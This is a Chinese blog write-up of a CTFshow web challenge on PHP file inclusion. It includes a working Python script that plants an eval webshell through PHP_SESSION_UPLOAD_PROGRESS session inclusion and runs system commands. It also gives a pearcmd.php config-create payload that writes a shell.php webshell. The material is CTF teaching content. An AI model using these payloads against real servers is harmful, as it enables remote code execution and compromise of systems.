CTFshow元旦水友赛-web-easy include

已于 2024-05-22 18:40:33 修改
阅读量397 收藏 4
点赞数 9
分类专栏: web 文章标签: web安全 网络安全 php
于 2024-05-22 18:36:50 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/jwkaaaaaa/article/details/139126814
版权

   显然这是一道文件包含的题目。其中有一个waf,过滤了’.’,post的开头必须是a-z之间的字母。

其他方法都不太行,因为过滤了’.’且固定了file://的形式。

这道题有两个方法,分别是session文件包含和pear文件包含。

  • 一、session文件包含

session文件包含其实就是客户端构造一个POST请求,同时数据包包含参数"PHP_SESSION_UPLOAD_PROGRESS",该参数会被短暂地包含进一个临时的session文件下,为session文件命名、上传后进行包含,就能执行文件中的内容。

直接上python脚本。

import requests

url="https://5f14ee60-a833-470e-a99e-2ede9df8e938.challenge.ctf.show/"

data={

    'PHP_SESSION_UPLOAD_PROGRESS':'<?php eval($_POST[2]);?>',

    '1':'localhost/tmp/sess_xiaokai',

    '2':'system("cat /f*");'

}

files={

    'file':'xiaokai'

}

cookies={

    'PHPSESSID':'xiaokai'

}

response=requests.post(url=url,data=data,files=files,cookies=cookies)

print(response.text)

本题不需要条件竞争,有关条件竞争的可以看p神的博客:

https://www.leavesongs.com/PENETRATION/docker-php-include-getshell.html

  • 二、pear文件包含

有关pear文件包含详情也可以看p神的博客。

构造payload:

https://706f52b0-cbb4-43b1-b10f-e881ab5ef0f4.challenge.ctf.show/?+config-create+/&/<?=eval($_POST[2]);?>+/var/www/html/shell.php

POST:1=localhost/usr/local/lib/php/pearcmd.php

这里的’.’本应该是被过滤的,但是不知道为什么就是可以被包含。有哪位懂的大佬可以评论区教我一下~

然后用bp抓以上payload的数据包。

这里显示shell.php被成功写入

直接利用

拿下flag!

流星划过小凯
关注
  • 9
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
元旦倒计时代码-具体展示效果
09-06
元旦倒计时代码-具体展示效果
元旦倒计时代码-python3
12-08
元旦倒计时代码_python3
CTFshow】元旦水友赛easy_include
qq_48932191的博客
01-20 1145
'1': 'localhost/tmp/sess_ctfshow',#php session以文件形式存储的默认路径,session文件默认命名方式是sess_'PHP_SESSION_UPLOAD_PROGRESS': '
ctfshow元旦easy_include
weixin_62306641的博客
01-06 1145
比赛的时候没做出来,试了伪协议没想到文件包含。赛后看完wp才明白。
ctfshow命令执行
热门推荐
njh18790816639的博客
04-14 1万+
web29 error_reporting(0); if(isset($_GET['c'])){ $c = $_GET['c']; if(!preg_match("/flag/i", $c)){ eval($c); } }else{ highlight_file(__FILE__); } 过滤了flag(无论大小写) 然后开始构造url http://d21fb9a4-ae00-4ab5-89a5-21dbe59eaa19.challenge.
ctfshow2024元旦web
NYG694的博客
01-04 1835
2024ctfshow水友元旦web方向题解---更新中
WebCTFSHOW元旦水友赛部分wp
uuzeray的博客
01-02 3855
web一共5题,我出了3题,巧的是好像师傅们也只出了3题,跨年拿旗还是很快乐的,下面直接贴出自己的wp.
元旦倒计时代码-js DOM完成
12-09
元旦倒计时代码——js DOM完成 通过javascript的dom来完成的元旦倒计时,神奇的是body完全是空的,没有任何代码,但是依然能完成变化的效果,我添加的MP3来恭祝元旦
2021年元旦假期出行预测报告-百度地图-2021.pdf
04-11
2021年元旦假期出行预测报告-百度地图-2021
2022年市场-移动通信元旦春节营销方案.pptx
11-14
2022年市场-移动通信元旦春节营销方案.pptx
CTFshow元旦水友赛web部分题解
qq_34942239的博客
01-27 1234
Chu0_write:被创建时候,chu0被赋值为xiuxiuxiu,当Chu0_write被当作字符串使用时,如果chu0和chu1相等,content则为ctfshowshowshowww和get传参的chu0拼接后字符,如果name中的“base64”个数为1或者有其他方法,将content写入name.txt,其中name用get上传。get传参show_show.show,先后进行waf1 和waf2如果绕过正则,进行反序列化。可以看到能读取到文件,读取一些配置文件无果,尝试用pear文件包含。
ctfshow 常用姿势
qq_53063436的博客
11-02 892
ctfshow 常用姿态
CTFSHOW-文件包含
m0_74606212的博客
03-24 379
CTFSHOW-文件包含
pearcmd.php文件包含,相关CTF例题
m0_63716101的博客
11-27 1087
pear的默认安装路径为/usr/local/lib/php/pear.php,在命令行中可以使用pear和/usr/local/lib/php/pear.php运行,如果存在文件包含漏洞,则可以直接运行此命令,下面我们介绍一下register_argc_argv选项,如果此选项打开,则此时用户输入的内容。file后面是pearcmd的默认路径,因为Index.php提示了后面会加php,所以直接/usr/local/lib/php/pearcmd就好了。但他最后会在file后面加个.php,题目提示了。
pear文件利用 (远程文件下载、生成配置文件、写配置文件) 从一道题看——CTFshow私教 web40
Jay17的博客
07-26 791
pear文件利用 (远程文件下载、生成配置文件、写配置文件) 从一道题看——CTFshow私教 web40
CTFshow刷题日记-WEB-文件包含
Love&Share
09-04 4131
文件包含专题 web78 if(isset($_GET['file'])){ $file = $_GET['file']; include($file); }else{ highlight_file(__FILE__); } 依旧是代码审计类型 直接伪协议 ?file=php://filter/convert.base64-encode/resource=flag.php ?file=data://text/plain,<?php system("nl flag.php");
pear文件包含学习记录
paidx0
04-07 718
中文全称PHP扩展应用库 php go-pear.php即可安装,没有就先要去官网下 go-pear.php 一般都是装在/usr/local/lib/php/pearcmd.php 然后就是要在php.ini处找到这个给打开register_argc_argv=ON,默认也是开启的 下面就可以愉快的测试了 正文 开启register_argc_argv 有什么用处?开启了之后$_SERVER[‘argv’]就开始生效了 <?php var_dump($_SERVER); ?> ["arg
php 利用pearcmd实现裸文件包含
weixin_45805993的博客
12-03 1874
主要内容参考P神博客https://www.leavesongs.com/PENETRATION/docker-php-include-getshell.html 0x00phpinfo与条件竞争 之前做题好像遇到过,再复习一下 我们对任意一个PHP文件发送一个上传的数据包时,不管这个PHP服务后端是否有处理$_FILES的逻辑,PHP都会将用户上传的数据先保存到一个临时文件中,这个文件一般位于系统临时目录,文件名是php开头,后面跟6个随机字符;在整个PHP文件执行完毕后,这些上传的临时文件就会被清理掉
ctfshow元旦水友赛wp
最新发布
04-13
很抱歉,我无法提供关于ctfshow元旦水友赛wp的具体介绍,因为我无法获取实时的比赛信息。但是,我可以告诉你一些关于CTF比赛的基本知识和常见的解题思路。 CTF(Capture The Flag)比赛是一种网络安全竞赛,旨在考察参赛者在网络安全领域的技能和知识。比赛通常包括密码学、逆向工程、Web安全、二进制漏洞利用等多个领域的题目。 在CTF比赛中,参赛者需要通过解决一系列的题目来获取旗帜(Flag),并提交给比赛平台进行得分。每个题目都有不同的解题思路和技巧,有些可能需要进行逆向分析、漏洞利用,有些可能需要进行密码学算法破解或者Web应用漏洞挖掘。 解题过程中,参赛者通常需要具备良好的编程和网络安全知识,能够熟练运用各种工具和技术进行分析和攻击。此外,团队合作和快速学习能力也是取得好成绩的重要因素。 如果你对CTF比赛感兴趣,可以参加一些线上或线下的CTF比赛,通过实践来提升自己的技能。同时,也可以学习相关的网络安全知识和技术,例如密码学、漏洞利用、网络协议等。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值